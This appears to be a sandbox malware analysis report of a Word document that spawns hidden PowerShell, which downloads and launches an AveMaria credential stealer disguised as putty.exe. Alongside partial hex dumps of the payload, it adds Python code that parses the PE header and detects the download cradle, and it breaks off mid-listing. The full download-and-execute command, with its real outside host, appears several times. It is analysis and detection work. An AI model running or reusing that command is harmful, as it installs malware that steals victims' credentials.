23 00 00 0a 80 05 00 00 04 2a 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 24 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 25 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 26 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 27 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 28 00 00 0a 0a 2b 00 06 2a 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 29 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 2a 00 00 0a 6f 2b 00 00 0a 73 2c 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 31 00 00 70 7e 07 00 00 04 6f 2d 00 00 0a 28 2e 00 00 0a 0b 07 74 24 00 00 01 0a 2b 00 06 2a 00 00 13 30 03 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 37 00 00 70 7e 07 00 00 04 6f 2d 00 00 0a 28 2e 00 00 0a 0b 07 74 24 00 00 01 0a 2b 00 06 2a 00 00 13 30 03 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 3f 00 00 70 7e 07 00 00 04 6f 2d 00 00 0a 28 2e 00 00 0a 0b 07 74 24 00 00 01 0a 2b 00 06 2a 00 00 13 30 03 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 45 00 00 70 7e 07 00 00 04 6f 2d 00
                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL1aP.L `@ `@KO` @ H.text, . `.rsrc `0@@.reloc@@BKH0dso(*&(*ss s!s"s#*0~o$+*0~o%+*0~o&+*0~o'+*0~o(+*0<~(),!rp(*o+s,~+*0~+*"*0&(r1p~o-(.t$+*0&(r7p~o-(.t$+*0&(r?p~o-(.t$+*0&(rEp~o-
                                Aug 2, 2021 11:00:29.667186975 CEST2384INData Raw: 00 0a 28 2e 00 00 0a 0b 07 74 24 00 00 01 0a 2b 00 06 2a 00 00 13 30 03 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 4d 00 00 70 7e 07 00 00 04 6f 2d 00 00 0a 28 2e 00 00 0a 0b 07 74 24 00 00 01 0a 2b 00 06 2a 00 00 13 30 03 00 26 00 00 00 08
                                Data Ascii: (.t$+*0&(rMp~o-(.t$+*0&(r[p~o-(.t$+*0&(rkp~o-(.t$+*0&(r{p~o-(.t$+*0&(
                                Aug 2, 2021 11:00:29.667202950 CEST2385INData Raw: 06 72 8d 01 00 70 7e 07 00 00 04 6f 2d 00 00 0a 28 2e 00 00 0a 0b 07 74 24 00 00 01 0a 2b 00 06 2a 00 00 13 30 03 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 99 01 00 70 7e 07 00 00 04 6f 2d 00 00 0a 28 2e 00 00 0a 0b 07 74 24 00 00 01 0a 2b
                                Data Ascii: rp~o-(.t$+*0&(rp~o-(.t$+*0&(rp~o-(.t$+*0&(rp~o-(.t$+*0&(rp~o-(.t$+*
                                Aug 2, 2021 11:00:29.667218924 CEST2387INData Raw: 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 25 03 00 70 7e 07 00 00 04 6f 2d 00 00 0a 28 2e 00 00 0a 0b 07 74 24 00 00 01 0a 2b 00 06 2a 00 00 13 30 03 00 26 00 00 00 08 00 00 11 00 28 09 00 00 06 72 2d 03 00 70 7e 07 00 00 04 6f 2d 00 00 0a
                                Data Ascii: &(r%p~o-(.t$+*0&(r-p~o-(.t$+*0&(r7p~o-(.t$+*0&(rCp~o-(.t$+*0&(rOp~o-(.
                                Aug 2, 2021 11:00:29.697216034 CEST2388INData Raw: 7b 14 00 00 04 16 fe 01 02 7b 13 00 00 04 16 fe 01 60 0b 07 2c 04 17 0a 2b 34 02 7b 14 00 00 04 02 7b 13 00 00 04 d6 1f 40 fe 01 0c 08 2c 04 17 0a 2b 1b 02 17 28 51 00 00 06 02 18 28 51 00 00 06 5f 0d 09 2c 04 17 0a 2b 04 16 0a 2b 00 06 2a 00 00
                                Data Ascii: {{`,+4{{@,+(Q(Q_,++*0"@"@{k{k(5{{s6(7{s8""{k{ks5o9(:"@s;{{s<o
                                Aug 2, 2021 11:00:29.697247028 CEST2390INData Raw: 06 72 67 18 00 70 28 52 00 00 0a 0a 06 72 f0 18 00 70 28 52 00 00 0a 0a 06 72 79 19 00 70 28 52 00 00 0a 0a 06 72 02 1a 00 70 28 52 00 00 0a 0a 06 72 8b 1a 00 70 28 52 00 00 0a 0a 06 72 14 1b 00 70 28 52 00 00 0a 0a 06 72 9d 1b 00 70 28 52 00 00
                                Data Ascii: rgp(Rrp(Rryp(Rrp(Rrp(Rrp(Rrp(Rr&p(Rrp(Rr8p(Rrp(RrJp(Rrp(Rr\p(Rrp(Rrn p(Rr p(Rr!p(Rr"p(Rr"p(Rr
                                Aug 2, 2021 11:00:29.697258949 CEST2391INData Raw: 28 52 00 00 0a 0a 06 72 57 54 00 70 28 52 00 00 0a 0a 06 72 e0 54 00 70 28 52 00 00 0a 0a 06 72 69 55 00 70 28 52 00 00 0a 0a 06 72 f2 55 00 70 28 52 00 00 0a 0a 06 72 7b 56 00 70 28 52 00 00 0a 0a 06 72 04 57 00 70 28 52 00 00 0a 0a 06 72 8d 57
                                Data Ascii: (RrWTp(RrTp(RriUp(RrUp(Rr{Vp(RrWp(RrWp(RrXp(RrXp(Rr(Yp(RrYp(Rr:Zp(RrZp(RrL[p(Rr[p(Rr^\p(Rr\p(Rrp]p(Rr]p(Rr^p(R
                                Aug 2, 2021 11:00:29.697280884 CEST2392INData Raw: 06 72 be 8f 00 70 28 52 00 00 0a 0a 06 72 47 90 00 70 28 52 00 00 0a 0a 06 72 d0 90 00 70 28 52 00 00 0a 0a 06 72 59 91 00 70 28 52 00 00 0a 0a 06 72 e2 91 00 70 28 52 00 00 0a 0a 06 72 6b 92 00 70 28 52 00 00 0a 0a 06 72 f4 92 00 70 28 52 00 00
                                Data Ascii: rp(RrGp(Rrp(RrYp(Rrp(Rrkp(Rrp(Rr}p(Rrp(Rrp(Rrp(Rrp(Rr*p(Rrp(Rr<p(Rrp(RrNp(Rrp(Rr`p(Rrp(Rrr
                                Aug 2, 2021 11:00:29.697299004 CEST2394INData Raw: 28 52 00 00 0a 0a 06 72 ae cb 00 70 28 52 00 00 0a 0a 06 72 37 cc 00 70 28 52 00 00 0a 0a 06 72 c0 cc 00 70 28 52 00 00 0a 0a 06 72 49 cd 00 70 28 52 00 00 0a 0a 06 72 d2 cd 00 70 28 52 00 00 0a 0a 06 72 5b ce 00 70 28 52 00 00 0a 0a 06 72 e4 ce
                                Data Ascii: (Rrp(Rr7p(Rrp(RrIp(Rrp(Rr[p(Rrp(Rrmp(Rrp(Rrp(Rrp(Rrp(Rrp(Rrp(Rr,p(Rrp(Rr>p(Rrp(RrPp(Rrp(R
                                Aug 2, 2021 11:00:29.697319031 CEST2395INData Raw: 06 72 15 07 01 70 28 52 00 00 0a 0a 06 72 9e 07 01 70 28 52 00 00 0a 0a 06 72 27 08 01 70 28 52 00 00 0a 0a 06 72 b0 08 01 70 28 52 00 00 0a 0a 06 72 39 09 01 70 28 52 00 00 0a 0a 06 72 c2 09 01 70 28 52 00 00 0a 0a 06 72 4b 0a 01 70 28 52 00 00
                                Data Ascii: rp(Rrp(Rr'p(Rrp(Rr9p(Rrp(RrKp(Rrp(Rr]p(Rrp(Rrop(Rrp(Rrp(Rrp(Rrp(Rrp(Rrp(Rr.p(Rrp(Rr@p(Rr
                                Aug 2, 2021 11:00:29.697339058 CEST2396INData Raw: 28 52 00 00 0a 0a 06 72 7c 42 01 70 28 52 00 00 0a 0a 06 72 05 43 01 70 28 52 00 00 0a 0a 06 72 8e 43 01 70 28 52 00 00 0a 0a 06 72 17 44 01 70 28 52 00 00 0a 0a 06 72 a0 44 01 70 28 52 00 00 0a 0a 06 72 29 45 01 70 28 52 00 00 0a 0a 06 72 b2 45
                                Data Ascii: (Rr|Bp(RrCp(RrCp(RrDp(RrDp(Rr)Ep(RrEp(Rr;Fp(RrFp(RrMGp(RrGp(Rr_Hp(RrHp(RrqIp(RrIp(RrJp(RrKp(RrKp(RrLp(RrLp(R

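Sessions 2 and 3 above each return a Windows executable: the Data Raw column opens with 4d 5a (MZ), the DOS-stub string and 50 45 00 00 (PE). The Python below is an added example for this report, not Joe Sandbox output. It parses the first 0x178 bytes of the session 2 response body, transcribed from the dump, decodes the COFF header, the PE32 optional header and the data directories, and compares the compile timestamp with the Last-Modified header of the same response. The function names and the compiled_when_served check are this example's own; the PE32 layout it assumes is confirmed by the 0b 01 magic visible in the dump.

```python
"""Parse the PE header of the binary returned in HTTP session 2 (GET /putty.exe).

Added example for this report. CAPTURED_PE_HEADER is transcribed from the 'Data Raw'
column of the capture (first 0x178 bytes of the response body: DOS header, DOS stub,
COFF header, optional header and the 16 data directories). The function names and the
Last-Modified comparison are this example's own, not part of the sandbox report.
"""
import struct
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

CAPTURED_PE_HEADER = bytes.fromhex(
    # IMAGE_DOS_HEADER: 'MZ' ... e_lfanew = 0x80 at offset 0x3c
    "4d5a90000300000004000000ffff0000"
    "b8000000000000004000000000000000"
    "00000000000000000000000000000000"
    "00000000000000000000000080000000"
    # DOS stub: "This program cannot be run in DOS mode."
    "0e1fba0e00b409cd21b8014ccd215468"
    "69732070726f6772616d2063616e6e6f"
    "742062652072756e20696e20444f5320"
    "6d6f64652e0d0d0a2400000000000000"
    # 0x80: 'PE\0\0', Machine, NumberOfSections, TimeDateStamp, ... then the optional header
    "504500004c010300461f076100000000"
    "00000000e00002010b01500000200b00"
    "00080000000000007a3b0b0000200000"
    "00400b00000040000020000000020000"
    "04000000000000000400000000000000"
    "00800b00000200000000000002004085"
    "00001000001000000000100000100000"
    # 0xf0: LoaderFlags, NumberOfRvaAndSizes = 16, followed by the 16 data directories
    "00000000100000000000000000000000"
    "283b0b004f00000000400b00e4050000"
    "00000000000000000000000000000000"
    "00600b000c0000000000000000000000"
    "00000000000000000000000000000000"
    "00000000000000000000000000000000"
    "00000000000000000020000008000000"
    "00000000000000000820000048000000"
    "0000000000000000"
)
LAST_MODIFIED_HEADER = "Sun, 01 Aug 2021 22:25:10 GMT"   # from the same HTTP response

MACHINE_NAMES = {0x14C: "i386", 0x8664: "amd64"}
SUBSYSTEM_NAMES = {2: "WINDOWS_GUI", 3: "WINDOWS_CUI"}
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14                # CLR runtime header slot


def pe_timestamp_to_utc(stamp: int) -> datetime:
    """The COFF TimeDateStamp is seconds since the Unix epoch."""
    return datetime.fromtimestamp(stamp, tz=timezone.utc)


def parse_pe_header(data: bytes) -> dict:
    """Return the header fields that matter at triage, or raise ValueError."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    machine, nsections, stamp, _symtab, _nsyms, _opt_size, chars = struct.unpack_from(
        "<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24                                   # start of the optional header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic != 0x10B:   # PE32 only; PE32+ (0x20B) has 8-byte ImageBase and shifted offsets
        raise ValueError("only PE32 is handled in this example")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    n_dirs = struct.unpack_from("<I", data, opt + 92)[0]
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(n_dirs)]
    clr_rva, clr_size = dirs[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR] if n_dirs > 14 else (0, 0)
    return {
        "machine": MACHINE_NAMES.get(machine, hex(machine)),
        "sections": nsections,
        "timestamp": stamp,
        "compiled_utc": pe_timestamp_to_utc(stamp),
        "characteristics": chars,
        "entry_point": image_base + entry_rva,
        "subsystem": SUBSYSTEM_NAMES.get(subsystem, subsystem),
        "dll_characteristics": dll_chars,
        "is_dotnet": clr_rva != 0 and clr_size != 0,      # a CLR header means a .NET assembly
    }


def compiled_when_served(header: dict, last_modified: str) -> bool:
    """True when the compile stamp equals the server's Last-Modified to the second,
    i.e. the payload was built and staged on the web server in one step."""
    return header["compiled_utc"] == parsedate_to_datetime(last_modified)


if __name__ == "__main__":
    info = parse_pe_header(CAPTURED_PE_HEADER)
    for key, value in info.items():
        print(f"{key:20} {value}")
    print("compiled == Last-Modified:", compiled_when_served(info, LAST_MODIFIED_HEADER))
```

On the embedded header this reports i386, 3 sections, GUI subsystem, a CLR header at RVA 0x2008 (a .NET assembly, consistent with "Programmed in: .Net C# or VB.NET" for putty.exe in the process list below) and a TimeDateStamp of 0x61071f46 = 2021-08-01 22:25:10 UTC, which is exactly the Last-Modified of /putty.exe. The /microC.exe header in session 3 carries 0x61079b31 = 2021-08-02 07:13:53 UTC, again exactly its Last-Modified. A compile stamp that coincides with the upload time to the second points to a build-and-stage pipeline, and both payloads were only hours old when this sample ran; the Content-Length of 731648 also matches the putty.exe file size recorded in the process list.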

                                Code Manipulations

                                Statistics

                                CPU Usage

                                Memory Usage

                                High Level Behavior Distribution

                                Behavior

                                System Behavior

                                General

                                Start time:10:59:37
                                Start date:02/08/2021
                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                Wow64 process (32bit):false
                                Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                Imagebase:0x13f7d0000
                                File size:1424032 bytes
                                MD5 hash:95C38D04597050285A18F66039EDB456
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Start time:10:59:40
                                Start date:02/08/2021
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
                                Imagebase:0x13f100000
                                File size:473600 bytes
                                MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000003.00000002.2094462607.0000000000160000.00000004.00000020.sdmp, Author: Florian Roth
                                Reputation:high

                                General

                                Start time:10:59:40
                                Start date:02/08/2021
                                Path:C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE
                                Wow64 process (32bit):false
                                Commandline:'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT
                                Imagebase:0x13f870000
                                File size:157024 bytes
                                MD5 hash:AF5CCD95BAC7ADADD56DE185D7461B2C
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                General

                                Start time:10:59:41
                                Start date:02/08/2021
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
                                Imagebase:0x13f100000
                                File size:473600 bytes
                                MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000006.00000002.2096261364.00000000002C0000.00000004.00000020.sdmp, Author: Florian Roth
                                Reputation:high

                                General

                                Start time:10:59:41
                                Start date:02/08/2021
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''
                                Imagebase:0x13f100000
                                File size:473600 bytes
                                MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Reputation:high

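The three powershell.exe instances above carry the same download-and-execute cradle: -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo, followed by a WebClient.DownloadFile into AppData\Roaming and a Start-Process of the result. A detection has to normalise the abbreviated switches first, because powershell.exe resolves a switch from any prefix down to a short minimum (-NoP, -NonI, -W as seen here; -EP is a documented alias), so matching the literal string "-NoProfile" misses this sample. The Python below is an added example, not part of the report or of the PowerShell_Susp_Parameter_Combo rule it echoes: the switch table, the indicator patterns and the weights are this example's own choices, and the three log lines are constructed, the first reproducing the command line recorded above.

```python
"""Triage logic for the PowerShell download-and-execute cradle spawned by WINWORD.EXE in
this report. Added example, not Joe Sandbox output: switch table, indicator regexes and
weights are this example's choices; the log lines are constructed, the first reproducing
the command line recorded in the process list.
"""
import re

# powershell.exe resolves a switch by prefix once at least a minimum abbreviation is given
# (-NoP, -NonI, -W, -Ex, -EP ...). The table approximates the console host's rules so the
# detector sees the same switch whether it was spelled out or abbreviated.
SWITCH_TABLE = [  # (canonical name, string the typed prefix is matched against, min length)
    ("NoProfile", "noprofile", 3),
    ("NonInteractive", "noninteractive", 4),
    ("NoLogo", "nologo", 3),
    ("Sta", "sta", 1),
    ("WindowStyle", "windowstyle", 1),
    ("ExecutionPolicy", "executionpolicy", 2),
    ("ExecutionPolicy", "ep", 2),             # -ep alias
    ("EncodedCommand", "encodedcommand", 1),
    ("Command", "command", 1),
    ("File", "file", 1),
]
VALUE_SWITCHES = {"WindowStyle", "ExecutionPolicy", "EncodedCommand"}
BODY_SWITCHES = {"Command", "File"}           # the rest of the line is the payload

DOWNLOAD = re.compile(r"Net\.WebClient|Download(?:File|String|Data)|Invoke-WebRequest|"
                      r"Invoke-RestMethod|\b(?:iwr|irm|curl|wget)\b|Start-BitsTransfer", re.I)
EXECUTE = re.compile(r"Start-Process|\bsaps\b|\biex\b|Invoke-Expression|Invoke-Item", re.I)
DROP_PATH = re.compile(r"AppData\\(?:Roaming|Local)|ProgramData|\\Temp\\", re.I)
TOKEN = re.compile(r"\"[^\"]*\"|'[^']*'|\S+")   # quoted group or bare word


def resolve_switch(text: str):
    """Map an abbreviated switch ('NoP', 'w', 'ep') to its canonical name, or None."""
    t = text.lower()
    for canonical, target, min_len in SWITCH_TABLE:
        if len(t) >= min_len and target.startswith(t):
            return canonical
    return None


def parse_powershell_cmdline(cmdline: str) -> dict:
    """Split a logged command line into normalised switches and the command/script body."""
    switches, body = {}, ""
    tokens = list(TOKEN.finditer(cmdline))
    i = 1                                     # tokens[0] is the powershell.exe path
    while i < len(tokens):
        raw = tokens[i].group().strip("'\"")
        if not raw.startswith(("-", "/")):    # positional argument: treat it as the body
            body = cmdline[tokens[i].start():].strip().strip("'\"")
            break
        name = resolve_switch(raw[1:]) or raw
        if name in BODY_SWITCHES:             # -Command / -File swallow the rest of the line
            switches[name] = True
            body = cmdline[tokens[i].end():].strip().strip("'\"")
            break
        if name in VALUE_SWITCHES and i + 1 < len(tokens):
            switches[name] = tokens[i + 1].group().strip("'\"").lower()
            i += 2
        else:
            switches[name] = True
            i += 1
    return {"switches": switches, "body": body}


def analyze(cmdline: str) -> dict:
    """Score one process-creation command line and return a verdict with the reasons."""
    parsed = parse_powershell_cmdline(cmdline)
    sw, body = parsed["switches"], parsed["body"]
    score, reasons = 0, []
    for name, weight in (("NoProfile", 1), ("NonInteractive", 1), ("EncodedCommand", 2)):
        if name in sw:
            score += weight
            reasons.append(f"-{name}")
    if sw.get("WindowStyle") == "hidden":
        score += 2
        reasons.append("-WindowStyle Hidden")
    if sw.get("ExecutionPolicy") in ("bypass", "unrestricted"):
        score += 2
        reasons.append(f"-ExecutionPolicy {sw['ExecutionPolicy']}")
    flags = {"download": bool(DOWNLOAD.search(body)), "execute": bool(EXECUTE.search(body)),
             "drop-path": bool(DROP_PATH.search(body))}
    score += 2 * flags["download"] + 2 * flags["execute"] + flags["drop-path"]
    reasons += [k for k, hit in flags.items() if hit]
    if flags["download"] and flags["execute"]:
        verdict = "download_and_execute"
    elif score >= 5:                          # the parameter combination alone is enough
        verdict = "suspicious_parameter_combo"
    else:
        verdict = "benign_or_unknown"
    return {**parsed, "score": score, "reasons": reasons, "verdict": verdict}


# Constructed process-creation records; [0] is the line recorded in this report.
SAMPLE_LOG_LINES = [
    r"'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe''",
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\Invoke-Backup.ps1',
    r'''powershell -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"''',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG_LINES:
        result = analyze(line)
        print(result["verdict"], result["score"], result["reasons"])
```

The report's line scores 11 and is classified download_and_execute (hidden window, bypassed policy, no profile, non-interactive, WebClient download, Start-Process and a drop path under AppData\Roaming); the constructed administrative line with -NoProfile -ExecutionPolicy Bypass -File scores 3 and stays below the threshold, which is the point of weighting the combination rather than any single switch. The third line shows that -nop -w -ep -c resolve to the same canonical switches as the spelled-out forms.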
                                General

                                Start time:10:59:44
                                Start date:02/08/2021
                                Path:C:\Users\user\AppData\Roaming\putty.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\user\AppData\Roaming\putty.exe'
                                Imagebase:0x100000
                                File size:731648 bytes
                                MD5 hash:0CFE251E0B61BBC87656F52DEFAD4C53
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, Author: Joe Security
                                Antivirus matches:
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 28%, ReversingLabs
                                Reputation:low

                                General

                                Start time:10:59:44
                                Start date:02/08/2021
                                Path:C:\Users\user\AppData\Roaming\putty.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\user\AppData\Roaming\putty.exe'
                                Imagebase:0x100000
                                File size:731648 bytes
                                MD5 hash:0CFE251E0B61BBC87656F52DEFAD4C53
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2123072051.00000000035C1000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000B.00000002.2123072051.00000000035C1000.00000004.00000001.sdmp, Author: Joe Security
                                Reputation:low

                                General

                                Start time:10:59:51
                                Start date:02/08/2021
                                Path:C:\Users\user\AppData\Roaming\putty.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Users\user\AppData\Roaming\putty.exe
                                Imagebase:0x100000
                                File size:731648 bytes
                                MD5 hash:0CFE251E0B61BBC87656F52DEFAD4C53
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low

                                General

                                Start time:10:59:52
                                Start date:02/08/2021
                                Path:C:\Users\user\AppData\Roaming\putty.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Roaming\putty.exe
                                Imagebase:0x100000
                                File size:731648 bytes
                                MD5 hash:0CFE251E0B61BBC87656F52DEFAD4C53
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2118755811.00000000005B6000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000D.00000003.2118755811.00000000005B6000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2118971999.00000000005BD000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000D.00000003.2118971999.00000000005BD000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2119027493.00000000005C3000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000D.00000003.2119027493.00000000005C3000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2118869644.00000000005B6000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000D.00000003.2118869644.00000000005B6000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2118769952.00000000005BD000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000D.00000003.2118769952.00000000005BD000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: AveMaria_WarZone, Description: unknown, Source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2118879592.00000000005BD000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000D.00000003.2118879592.00000000005BD000.00000004.00000001.sdmp, Author: Joe Security
                                Reputation:low

                                General

                                Start time:10:59:52
                                Start date:02/08/2021
                                Path:C:\Users\user\AppData\Roaming\putty.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Users\user\AppData\Roaming\putty.exe
                                Imagebase:0x100000
                                File size:731648 bytes
                                MD5 hash:0CFE251E0B61BBC87656F52DEFAD4C53
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low

                                General

                                Start time:10:59:54
                                Start date:02/08/2021
